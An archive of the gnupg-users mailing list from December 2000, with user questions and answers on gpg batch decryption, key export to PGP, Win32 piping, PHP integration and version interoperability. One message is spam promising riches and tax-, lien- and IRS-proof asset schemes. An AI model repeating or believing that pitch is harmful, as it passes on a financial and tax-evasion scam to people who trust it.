12:54:44 +0100" References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> Message-ID: Werner Koch writes: > On Fri, 8 Dec 2000, explorer@flame.org wrote: > > > One, does --check-sig actually remove bad signatures? If > > not, what does? I'm getting tired of seeing warning > > It is not possible to remove bad signatures - every import would > merge them back in. Of course it would we possible to have an > option to not import bad signatures - nonody has yet requested for > it. I at least think it would be useful. Are they at least marked as bad in some database so they can be skipped when needed? > > It might be handy to have a --assign-ownertrust or > > --show-ownertrust command that will scan the public keyring, > > Yes. As soon as we will see more and more GUIs for gpg we can > implement it. I was going to use a combination of --list-keys and --with-colons to dump into a Perl script, but alas, that is _very_ slow. I know I should Use the Source, but does GPG cache public keys in memory rather than having to look them up constantly? Just a quick and dirty dump of the signature tree (assuming that bad signatures can be marked as such) should not take hours with under 2,000 keys. PGP is much, much worse in this area. I may start digging into the source when I can spare the time and add a few more raw file dumps, either as commands within gpg or as external tools. --Michael -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 8 17:45:45 2000 From: rich@cnylug.org (Rich) Date: Fri, 08 Dec 2000 12:45:45 -0500 Subject: GPGME Message-ID: <3A311E49186.20CBRICH@mail.dreamscape.com> OK, I've been reading this group for many months now, and saw a reference to GPGME for the first time (that I recall) about a week ago. I also saw is referenced to Timo and WinPT. What exactly is GPGME? Is there a link? Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sat Dec 9 18:47:21 2000 From: rich@cnylug.org (Rich) Date: Sat, 09 Dec 2000 13:47:21 -0500 Subject: Piping with Win32 Message-ID: <3A327E390.CEA7RICH@mail.dreamscape.com> Does piping work with GnuPG (Win32)? For example, trying to pipe the keyring list into MORE, or LESS doesn't work. But piping long directories into those utils does. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From remove@china.com Sat Dec 9 15:31:39 2000 From: remove@china.com (remove@china.com) Date: Sat, 9 Dec 2000 15:31:39 Subject: Live like the RICH Message-ID: <24.889896.792877@prodigy.com> This 2 minute message could change your LIFE ************************************************************ THIS ENTERPRISE IS AWESOMELY FEATURED IN OCTOBER 2000 MILLIONAIRE, FALL ISSUE 2000 TYCOON, AND AUGUST 2000 ENTREPRENEUR Magazine. Do you have a burning desire to change the quality of your existing life? Would you like to live the life that others only dream about? The fact is we have many people in our enterprise that earn over 50k per month from the privacy of their own home and are retiring in 2-3 years. Wealthy and having total freedom both personal and financial. READ ON! READ ON! READ ON! READ ON! READ ON! READ ON! How would you like to:(LEGALLY & LAWFULLY) 1. KEEP MOST OF YOUR TAX DOLLARS!!!!! 2. Drastically reduce personal, business and capitol gains taxes? 3. Protect all assets from any form of seizure, liens, or judgments? 4. Create a six figure income every 4 months? 5. Restoring and preserving complete personal and financial privacy? 6. Create and amass personal wealth, multiply it and protect it? 7. Realize a 3 to 6 times greater returns on your money? 8. Legally make yourself and your assets completely judgment-proof, SEIZURE-PROOOOF, LIEN-PROOOOOOF, DIVORCE-PROOOOOOF, ATTORNEY-PROOOOOOF, IRS-PROOOOOOF ((((((((((((((((((((BECOME COMPLETELY INSULATED)))))))))))))))))))))))) ((((((((((((((((((((((HELP PEOPLE DO THE SAME)))))))))))))))))))))))))) Are you a thinker, and a person that believes they deserve to have the best in life? Are you capable of recognizing a once in a lifetime opportunity when it's looking right at you? Countless others have missed their shot. Don't look back years later and wish you made the move. It's to my benefit to train you for success. In fact, I'm so sure that I can do so, I'm willing to put my money where my mouth is! Upon accepting you as a member on my team, I will provide you with complete Professional Training as well as FRESH inquiring LEADS to put you immediately on the road to success. If you are skeptical that's OK but don't let that stop you from getting all the information you need. DROP THE MOUSE AND CALL 415-273-5279 DROP THE MOUSE AND CALL *********************** 415-273-5279 ******************* -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From AshrafG@gtriad.com Sat Dec 9 23:55:55 2000 From: AshrafG@gtriad.com (Ashraf Gad) Date: Sat, 9 Dec 2000 18:55:55 -0500 Subject: passphrase Message-ID: <001e01c0623b$92e11170$acc01dac@gtriad.com> Can we use GPG to decrypt any file using batch mode .. i.e . I do not want to manually enter the passphrase. I need to store it in a file and pass the file name in my options. Ex : When I Encrypt my file I use : gpg.exe --output [Filename.gpg] --recipient [name] Filename.txt where : Filename.txt is my original file Filename.gpg is my encrypted file name is my key name Now When I'm decrypting my file, I need to do the following gpg.exe --output [Filename.txt] --decrypt ????? Filename.key Filename.gpg where : Filename.txt is my decrypted file Filename.gpg is my encrypted file Filename.key is my passphrase stored in a file Please CC: me in your reply as I am not subscribed. Ashraf Gad Senior Software Engineering G.Triad Tel: 212.924.8005 X 131 Fax: 212.924.8036 AshrafG@gtriad.com http://www.gtriad.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Sun Dec 10 00:52:52 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Sun, 10 Dec 2000 01:52:52 +0100 Subject: passphrase References: <001e01c0623b$92e11170$acc01dac@gtriad.com> Message-ID: <002101c06243$86aa1c00$2bf8ae8b@bert> Try this: gpg --decrypt filename.gpg --passphrase-fd 0 1> filename.txt < filename.key This means that you are piping stdout (1) to (>) filename.txt and also piping to 0 from (<) filename.key That should do the trick for you! Stephan ----- Original Message ----- From: "Ashraf Gad" To: Cc: Sent: Sunday, December 10, 2000 12:55 AM Subject: passphrase > > Can we use GPG to decrypt any file using batch mode .. i.e . I do not want > to manually enter the passphrase. I need to store it in a file and pass the > file name in my options. > > > Ex : > > When I Encrypt my file I use : > > gpg.exe --output [Filename.gpg] --recipient [name] Filename.txt > > where : Filename.txt is my original file > Filename.gpg is my encrypted file > name is my key name > > Now When I'm decrypting my file, I need to do the following > > gpg.exe --output [Filename.txt] --decrypt ????? Filename.key > Filename.gpg > > where : Filename.txt is my decrypted file > Filename.gpg is my encrypted file > Filename.key is my passphrase stored in a file > > > > Please CC: me in your reply as I am not subscribed. > > Ashraf Gad > Senior Software Engineering > G.Triad > Tel: 212.924.8005 X 131 > Fax: 212.924.8036 > AshrafG@gtriad.com > http://www.gtriad.com > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Sun Dec 10 06:05:31 2000 From: lists@wordit.com (Marcus) Date: Sun, 10 Dec 2000 07:05:31 +0100 Subject: Piping with Win32 In-Reply-To: <3A327E390.CEA7RICH@mail.dreamscape.com> References: <3A327E390.CEA7RICH@mail.dreamscape.com> Message-ID: <200012100705310981.00BA3FA7@smtprelay.t-online.de> On 09.12.00 at 13:47 Rich wrote: >Does piping work with GnuPG (Win32)? Partly at least. > For example, trying to pipe the keyring list into MORE, or LESS doesn't >work. But piping long directories into those utils does. What are trying to do in practice? c:\>more i use PGP Freeware Version 6.5.3. after i download gnupg version 1.0.4. i want to import the keys which i create with gpp. i´m able to import public-keys, which i create with gungp version 1.0.4 But, i´m not able to import private-keys, which i create with gnupg. To make an export i use the command gpg --export-secret-keys. is there a way to import private-keys in PGP Freeware Version? my OS is WIN 98 thank you in advance, theo krueck -- Sent through GMX FreeMail - http://www.gmx.net -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 11 02:10:48 2000 From: lists@wordit.com (Marcus) Date: Mon, 11 Dec 2000 03:10:48 +0100 Subject: Piping with Win32 In-Reply-To: <3C14E7E1384.19B0RICH@mail.dreamscape.com> References: <3A327E390.CEA7RICH@mail.dreamscape.com> <3C14E7E1384.19B0RICH@mail.dreamscape.com> Message-ID: <200012110310480303.001E74AE@smtprelay.t-online.de> On 10.12.01 at 11:50 Rich wrote: > I'm trying to get my keyring list to stop after every page. Or when I >occasionally read the GPG help screen. The following reply was sent to me by private mail: "On 10.12.00 at 12:26 Jordi Negrevernis i Font wrote: >Try >gpg --list-keys | more" That is what one would expect to work. My key list is only two lines, so I can't tell if it works. I'm guessing you already tried the above? Marcus -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Mon Dec 11 02:25:58 2000 From: rich@cnylug.org (Rich) Date: Sun, 10 Dec 2000 21:25:58 -0500 Subject: Piping with Win32 In-Reply-To: References: <3C14E7E1384.19B0RICH@mail.dreamscape.com> Message-ID: <3A343B363AC.2762RICH@mail.dreamscape.com> On Mon, 11 Dec 2000 03:10:48 +0100 or Thereabouts The voices in my head told me that "Marcus" said: > "On 10.12.00 at 12:26 Jordi Negrevernis i Font wrote: > >Try > >gpg --list-keys | more" > > That is what one would expect to work. My key list is only two lines, > so I can't tell if it works. I'm guessing you already tried the above? Yes, and I'm an idiot. :-) I figured out the problem today. To save enviroment space (so my path doesn't get way out of hand) I put a directory in my path that contains batch files that I use to call many of the programs and utils that I frequently use. I was calling GPG from a batch file, and that was why it wasn't working. I simply added gnupg to my path directly (no longer using a batch file) and piping works fine now. MY FAULT. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 11 03:08:51 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 11 Dec 2000 04:08:51 +0100 (CET) Subject: export secring In-Reply-To: <6370.976468700@www37.gmx.net> Message-ID: On Sun, 10 Dec 2000 theo.krueck@gmx.de wrote: > is there a way to import private-keys in PGP Freeware Version? This is a quote I once saved: > By default, I think GnuPG encrypts your secret key using the Blowfish > symmetric algorithm. PGP will only understand 3DES, CAST5, or IDEA > symmetric algorithms. The following method works for me: > > $ gpg --s2k-cipher-algo=CAST5 --s2k-digest-algo=SHA1 --compress-algo=1 \ > --edit-key username > > then use passwd to change the password (just change it to the same > thing, but it will encrypt the key with CAST5 this time). > > Now you can export it and PGP should be able to handle it. -Todd HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter Biechele Mon Dec 11 12:33:13 2000 From: Peter Biechele (Peter Biechele) Date: Mon, 11 Dec 2000 12:33:13 GMT Subject: Error/Warning when decrypting messages with my own key ? Message-ID: <20001211.12331300@morpheus.bextec.de> Hello ! I have a problem using gnupg 1.0.4. I have created my own key pair and have given it to somebody else. He is encrypting a file using my public key (PGP >6.5). Then I can decrypt this message using my own private key. This works fine, except that it always displays an error message like: A file encrypted by „other Company“ with the pulbic key of „Our Company“, decrypted again using the private key of „O'ur Company“: -------------------------------------- Sie benötigen ein Mantra, um den geheimen Schlüssel zu entsperren. Benutzer: "Our Company" 1024-Bit ELG-E Schlüssel, ID E06A7F65, erzeugt 2000-09-04 (Hauptschlüssel-ID A199E467) gpg: verschlüsselt mit ELG-E Schlüssel, ID A502F3A2 gpg: kein geheimer Schlüssel zur Entschlüsselung vorhanden gpg: verschlüsselt mit 3072-Bit ELG-E Schlüssel, ID 1756B1C4, erzeugt 2000-09-22 "Other Company" gpg: kein geheimer Schlüssel zur Entschlüsselung vorhanden What does it mean ??? It DOES decrypt the file, but still displays this warning/error ?? Is the encryption not correct or do we decrypt with wrong parameters or is it just a PGP/GnuPG warning ??? Thank you for any help ! Peter Biechele -- Dr. Peter Biechele Tel: +49 7641 920869 41 beXtec GmbH Fax: +49 7641 920869 49 Kaiserstuhlstr. 3, D-79312 Emmendingen E-Mail: Peter.Biechele@bextec.de HTTP : www.bextec.de -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 11 13:53:31 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 11 Dec 2000 14:53:31 +0100 Subject: Error/Warning when decrypting messages with my own key ? In-Reply-To: <20001211.12331300@morpheus.bextec.de>; from Peter.Biechele@bextec.de on Mon, Dec 11, 2000 at 12:33:13PM +0000 References: <20001211.12331300@morpheus.bextec.de> Message-ID: <20001211145331.C21969@gnupg.de> On Mon, 11 Dec 2000, Peter Biechele wrote: > What does it mean ??? > It DOES decrypt the file, but still displays this warning/error ?? > Is the encryption not correct or do we decrypt with wrong parameters or It just displays information about other recipients. The warning message is indeed annoying and I am looking forward to make the messages more clean. It should also display information about the key whichwas used to decrypt the message (in case you have several keypairs) Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jcarpenter@projectmayo.com Mon Dec 11 21:30:19 2000 From: jcarpenter@projectmayo.com (Jimmy "JimmyJames" Carpenter) Date: Mon, 11 Dec 2000 13:30:19 -0800 Subject: GPG and Java Message-ID: What facilities exist for programatically accessing GPG via Java? Even if native code is required, it would be nice to find a Java package that has already done this work and provides a simple API. I know similar things have been done for Perl and are available on CPAN. Please copy me in the reply at nawkboy@yahoo.com since I am not currently subscribed to the newsgroup. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jcarpenter@projectmayo.com Mon Dec 11 21:28:57 2000 From: jcarpenter@projectmayo.com (Jimmy "JimmyJames" Carpenter) Date: Mon, 11 Dec 2000 13:28:57 -0800 Subject: Please Message-ID: What facilities exist for programatically accessing GPG via Java? Even if native code is required, it would be nice to find a Java package that has already done this work and provides a simple API. I know similar things have been done for Perl and are available on CPAN. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Brad Allen , Brad Allen <802000207@RUMAc.UPRM.Edu> Tue Dec 12 08:12:47 2000 From: Brad Allen , Brad Allen <802000207@RUMAc.UPRM.Edu> (Brad Allen) Date: Tue, 12 Dec 2000 00:12:47 -0800 Subject: Trojan Keyboard Driver (was Re: Viewing Current Password) In-Reply-To: <3A32194C.26329.2C07D311@localhost> References: <3A32194C.26329.2C07D311@localhost> Message-ID: <20001212001247F.ulmo@komodo> This is getting off-topic misc@openbsd.org fast, but even worse is measuring typical letter keystroke seperations for typing depending on the pattern of keys typed and then using this simple time seperation technique to get a probability pattern of what the password could be. If I thought of that, then I know the NSA could have thought of even better schemes. All they need to do then is do a bit of QWERTY keyboard study and perhaps try to get some clear text or cracked samples of a target user's typing. A few minutes in a van physically would save a lot of time even if the user doesn't type the specific password wanted at that moment and NEVER uses TELNET (only unbroken SSH). I'm thinking OpenPGP implementations need something like OTP passwords or something. What is S/Key? Perhaps that, if it fits the bill ... (no repeated keystrokes) ... ah, yes it is, as described by RFC1760 (N. Haller, Bellcore, Feb. 1995); I have some concerns that the digest be strong enough (e.g., MD5 may be used by some systems, but MD5 had certain vulnerabilities which I forget; bitlength; etc.; RC4 looks to be default). I really have to read up on S/Key and choosing good hashes and bitlengths and stuff, and integration into GnuPG (cc'd to gnupg users list; cc to me but not to misc@openbsd.org please): has anybody made S/Key patches for GnuPG yet, or something even better than S/Key as described by RFC1760? This might stop even a van attack, even for those high-security GPG keys? I still want reasonable-security over-network keys right now. jim.moore> An article I saw recently described a similar technique jim.moore> used by the FBEye to capture PGP passwords being used by a jim.moore> suspected gangster. A reference to the article is provided jim.moore> below. To misc@openbsd.org --- sorry for my prolificness today. I'm getting used to the tone of the mailing list. To gnupg-users@gnupg.org --- please cc: me as I am not on the list, and answer my question about S/Key integration into GnuPG, and leave out cc:misc@openbsd.org unless you have a "yes" answer. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From jant@pluto.ncdgroep.nl Tue Dec 12 21:10:41 2000 From: jant@pluto.ncdgroep.nl (Jan-Tiddo) Date: Tue, 12 Dec 2000 22:10:41 +0100 Subject: GPG 1.0.4 and PGP7 Message-ID: <20001212221041.A3870@pluto.ncdgroep.nl> --Kj7319i9nmIyA2yE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hello, Please a CC to my address for replies. Thanx. When I send a pgp/gpg messages with mutt 1.2 (default sample source for mutt) to a window client with pgp7, I can't open the pgp attachment. Windows is talking about "Can't find PGP information in file" (or something like that). Anyone a similar experience and sollution? Regards, Jan-Tiddo. --Kj7319i9nmIyA2yE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjo2lE8ACgkQFJHobCIs4Q44iwCdE0n5z0Zh/AYPr17PXojdeeEM aS4AoMbfy66calc/7U0z1xSMrmYzxqgN =2be5 -----END PGP SIGNATURE----- --Kj7319i9nmIyA2yE-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From tbeidler@mindspring.com Tue Dec 12 21:30:21 2000 From: tbeidler@mindspring.com (Tom Beidler) Date: Tue, 12 Dec 2000 13:30:21 -0800 Subject: newbie question "Public key not found" with PHP Message-ID: Please CC me. I'm not sure if I'm subscribed yet. I'm having problems using GNUPG for the first time. I'm using it with PHP and I'll show you my code; // Set directory for "www"'s key ring putenv("GNUPGHOME=/var/www/.gnupg"); // Dump email message into indata file $fp = fopen("/usr/home/dogma/temp/indata", "w+"); fputs($fp, $msg); fclose($fp); // encrypt system("/usr/local/bin/gpg --encrypt -ao /usr/home/dogma/temp/outdata -r 'Joe Schmoe ' /usr/home/dogma/temp/indata "); unlink("/usr/home/dogma/temp/indata"); $crypted = "/usr/home/dogma/temp/outdata"; $fd = fopen($crypted, "r"); $mail_cont = fread($fd, filesize($crypted)); fclose($fd); unlink("$crypted"); I keep getting "Public key not found". The key lines are the "putenv" which is the directory of the PHP users key ring and "system" which is the actual command line. I've tried several variations of the public key, ie. 'Joe', 'Joe Schmoe', 'jschmoe@building.com'. I've tried telneting in as myself and encrypting something and I get the samething. When I --check-ring it shows that I have both my private and public key. Any help would be appreciated. Thanks, Tom >>.>>.>>>.>>>>>.>>>>>>>>> Tom Beidler Orbit Tech Services 805.455.7119 (cell) 805.682.8972 (phone) 805.682.5833 (fax) tbeidler@mindspring.com >>.>>.>>>.>>>>>.>>>>>>>>> -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From turfdog@planetturf.ca Wed Dec 13 01:58:01 2000 From: turfdog@planetturf.ca (Derek Vokey) Date: Tue, 12 Dec 2000 17:58:01 -0800 Subject: newbie question "Public key not found" with PHP References: Message-ID: <000401c064a8$23053100$01a800c0@derekvok> How did you set it up - running under your username or under the PHP user "nobody"? If you access it with php it wants "nobody's" keyring. I set it all up through scripts like so: (easy as all heck) &1",$e)."
"; echo "response to --gen-key:
"; while( $res=each($e) ) { echo "$res[1]
"; } ?> then run &1",$e)."
"; echo "
response to import:
"; while( $res=each($e) ) { echo "$res[1]
"; } ?> I also tried setting the environment variable as well and that works too. I hope you find some of this useful, Derek To the group -> This is a great program but i think that it would be helpful to have another mailing list dedicated to CGI so as to separate these issues from the critical encryption issues. Any takers? ----- Original Message ----- From: "Tom Beidler" To: Sent: Tuesday, December 12, 2000 1:30 PM Subject: newbie question "Public key not found" with PHP > Please CC me. I'm not sure if I'm subscribed yet. > > I'm having problems using GNUPG for the first time. I'm using it with PHP > and I'll show you my code; > > // Set directory for "www"'s key ring > putenv("GNUPGHOME=/var/www/.gnupg"); > > // Dump email message into indata file > $fp = fopen("/usr/home/dogma/temp/indata", "w+"); > fputs($fp, $msg); > fclose($fp); > > // encrypt > system("/usr/local/bin/gpg --encrypt -ao /usr/home/dogma/temp/outdata -r > 'Joe Schmoe ' /usr/home/dogma/temp/indata "); > > unlink("/usr/home/dogma/temp/indata"); > > $crypted = "/usr/home/dogma/temp/outdata"; > > $fd = fopen($crypted, "r"); > $mail_cont = fread($fd, filesize($crypted)); > fclose($fd); > > unlink("$crypted"); > > I keep getting "Public key not found". The key lines are the "putenv" which > is the directory of the PHP users key ring and "system" which is the actual > command line. I've tried several variations of the public key, ie. 'Joe', > 'Joe Schmoe', 'jschmoe@building.com'. > > I've tried telneting in as myself and encrypting something and I get the > samething. When I --check-ring it shows that I have both my private and > public key. > > Any help would be appreciated. > > Thanks, > Tom > > >>.>>.>>>.>>>>>.>>>>>>>>> > Tom Beidler > Orbit Tech Services > 805.455.7119 (cell) > 805.682.8972 (phone) > 805.682.5833 (fax) > tbeidler@mindspring.com > >>.>>.>>>.>>>>>.>>>>>>>>> > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 13 02:42:08 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 13 Dec 2000 02:42:08 GMT Subject: GPG 1.0.4 and PGP7 In-Reply-To: <20001212221041.A3870@pluto.ncdgroep.nl> References: <20001212221041.A3870@pluto.ncdgroep.nl> Message-ID: <20001213024030.F4E5.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Jan-Tiddo, On 12 December 2000, I received the following message from you regarding "GPG 1.0.4 and PGP7" J> Hello, J> J> Please a CC to my address for replies. Thanx. J> J> When I send a pgp/gpg messages with mutt 1.2 (default sample source for J> mutt) to a window client with pgp7, I can't open the pgp attachment. J> Windows is talking about "Can't find PGP information in file" (or J> something like that). J> J> Anyone a similar experience and sollution? Which Windows client? And did you send PGP/MIME? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 13 December 2000 02:40:30 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjbh/C7i2PqZ2xC9EQKp0ACfVZkH1givNzc54Q3rMVtbxrowDPEAoPX3 lGD4+I++JrwoSyjFkPmSOxCn =jesH -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From donfede@casagrau.org Wed Dec 13 03:02:28 2000 From: donfede@casagrau.org (Federico Grau) Date: Tue, 12 Dec 2000 22:02:28 -0500 Subject: option for viewing by recipient only Message-ID: <20001212220228.E1120@casagrau.org> Hello folks, I have looked through the faq, searched the mailing list, and checked with the RFC with no answer yet, so I come to you. There is an option in pgp 6.5 (the 'free' unix command line version) that allows a person encrypting the message to "mark it for viewing by recipient only". The command line option is "pgp -sem ". Documentation of it can be found on page 39 of the _PGP Command Line - Freeare User's Guide Version 6.5_. Is there such an option for gpg? Are there plans to implement such an option in gpg... if not how much effort should it be? thanks, donfede ps. If people were interested, I need this because I have an script sending encrypted emails with credit card information to a person on a mac using some version of pgp and eudora. The recipient is able to decrypt the email with no problem, however if the user is not careful (and as we know they too often are not) they can save the UNENCRYPTED email... no only leaving sensitive information on their machine, but also loosing/replacing the encrypted version (so its not even a matter of deleting the sensitive unencrypted versions). I understand that this "secure viewing option" is not failsafe and of course a dedicated person can still make a permanent copy of the unencrypted text, however it will make it more difficult for simple mistakes to happen. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From e.sanchez@maximiles.com Wed Dec 13 08:44:18 2000 From: e.sanchez@maximiles.com (=?iso-8859-1?Q?Eduardo_S=E1nchez?=) Date: Wed, 13 Dec 2000 09:44:18 +0100 Subject: Problems with gnupg Message-ID: Hi, I´m having the trouble when I try to open this file. This file is cripted with NT version and trying to uncript it with linux. I get this message. Do you have any idea why ? gpg: invalid radix64 character 00 skipped -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.2 (MingW32) Comment: For info see http://www.gnupg.org hQEOA2FZtT52w6+7EAQAgPJ7ilBiSPpdYvpxqtWTwxomixdzVsRTycq6y6o7YeuR RMJ1bBW95zxZCqLfUjOoV7ArJO/bX/Cnqg38VxAkKrn/gT6M/mDEThRD+KjYoe0u 5G0TtZ4Ofa1EUdrjxdv42UV710otmokdxLOAXAjDZFLApW6z7IEfnPH9WebXUJAD /R7dNN70a1jH3rerelcpverEmdsZw2EoGqVh/ikFIO2rlVAFLa8UuVIIMIxnX6hT FdZ8KgYU6RtGtasZ/Ewmio8lI4fkmAtIvQFqLPCzKaEGvfJmsDeV5iBnV48JzHld 6loon0+m0RtvpcC2ABoN+sCYoAtYWIMeg1KP8igASZ+FycA04ZsUt8rVk+X3hT/f N/GX4zxIBrG1fs4X+hFg+NfVrjEARw79BqNk9liE42gH91XNnqKN1dW3ahZ3Oh/A Y8e/DcN5R9rhjUbA85FIMJyrBebNCDbNJKoGDfHFWniifnQj859A3yqqXngrSBzH 8o93l25+Ox28vaVnN2jceGvw3NY/dnDIL6aMuHldvt0SOKFILKTq02jQGyHDDAxl z9iYMY2lDPlWcKbmNy1aqRwK3p6MD7/Ld49fj9zPnq114G8xATLcueRHm9fs5aiO M+9gwIqtw99i9jqdn4y4FAJKcA0RuhtWETmPvwj07IPPMxFRbdmZfg== =5J2m -----END PGP MESSAGE----- Do you have any idea why ? Thanks so much for your help This is the message.... -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.2 (MingW32) Comment: For info see http://www.gnupg.org hQEOA2FZtT52w6+7EAQAgPJ7ilBiSPpdYvpxqtWTwxomixdzVsRTycq6y6o7YeuR RMJ1bBW95zxZCqLfUjOoV7ArJO/bX/Cnqg38VxAkKrn/gT6M/mDEThRD+KjYoe0u 5G0TtZ4Ofa1EUdrjxdv42UV710otmokdxLOAXAjDZFLApW6z7IEfnPH9WebXUJAD /R7dNN70a1jH3rerelcpverEmdsZw2EoGqVh/ikFIO2rlVAFLa8UuVIIMIxnX6hT FdZ8KgYU6RtGtasZ/Ewmio8lI4fkmAtIvQFqLPCzKaEGvfJmsDeV5iBnV48JzHld 6loon0+m0RtvpcC2ABoN+sCYoAtYWIMeg1KP8igASZ+FycA04ZsUt8rVk+X3hT/f N/GX4zxIBrG1fs4X+hFg+NfVrjEARw79BqNk9liE42gH91XNnqKN1dW3ahZ3Oh/A Y8e/DcN5R9rhjUbA85FIMJyrBebNCDbNJKoGDfHFWniifnQj859A3yqqXngrSBzH 8o93l25+Ox28vaVnN2jceGvw3NY/dnDIL6aMuHldvt0SOKFILKTq02jQGyHDDAxl z9iYMY2lDPlWcKbmNy1aqRwK3p6MD7/Ld49fj9zPnq114G8xATLcueRHm9fs5aiO M+9gwIqtw99i9jqdn4y4FAJKcA0RuhtWETmPvwj07IPPMxFRbdmZfg== =5J2m -----END PGP MESSAGE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter.Bloecher@eed.ericsson.se Wed Dec 13 12:37:48 2000 From: Peter.Bloecher@eed.ericsson.se (Peter Bloecher (EED)) Date: Wed, 13 Dec 2000 13:37:48 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem Message-ID: <3A376D9C.49D13756@eed.ericsson.se> Hello, After upgrading to gpg 1.0.4 I discovered a problem when exchanging messages with people using gpg 1.0.0. What happens is that during decryption they are asked to enter their private key, but then no decrypted output is produced. No message is printed, either -- just nothing happens. gpg 1.0.4 can decrypt the message without problem. [this is all happening on SunOS 5.6 = Solaris 2.6] Calling gpg 1.0.0 with --list-packets results in :pubkey enc packet: version 3, algo 16, keyid 274336D3E7F40A9D data: [1022 bits] data: [1022 bits] :unknown packet: type 18, length 0 dump: 01 e2 83 8e 36 0d 30 d7 2f cb 17 29 48 b1 9d b3 99 02 57 b4 90 51 73 48 24: 38 f6 32 c7 de 14 3d ee e8 ee 46 90 5a da 91 4a 6d 59 d1 71 15 03 35 07 (dunp continues) Calling gpg 1.0.4 with --list-packets gives :pubkey enc packet: version 3, algo 16, keyid 274336D3E7F40A9D data: [1022 bits] data: [1022 bits] :encrypted data packet: length: 4294967295 mdc_method: 2 :compressed packet: algo=2 :literal data packet: mode b, created 976709893, name="testtext", raw data: 1420 bytes The length field of the encrypted packet looks suspicious, but that does not have to be connected to the problem. I am able to reproduce the problem with test data and a test key. They are available on request. Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that there might be interoperability problems with, e.g., PGP. Any advice? Best regards, /Peter PS: Please CC me on any answer - I'm not subscribed to the list -- Peter Bloecher, Ericsson Research Speech & Signal Processing Ericsson Eurolab Deutschland GmbH Tel: +49 911 5217-307 Nordostpark 12 Fax: +49 911 5217-961 D-90411 Nuernberg mailto:Peter.Bloecher@eed.ericsson.se -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 12:54:00 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 13:54:00 +0100 Subject: public key data output to a file? Message-ID: <000b01c06503$c38feab0$2bf8ae8b@bert> Hi! Is it possible to output the data of a public key to a file? These parameters: gpg --batch --yes --output [File]--edit-key [ID] pref 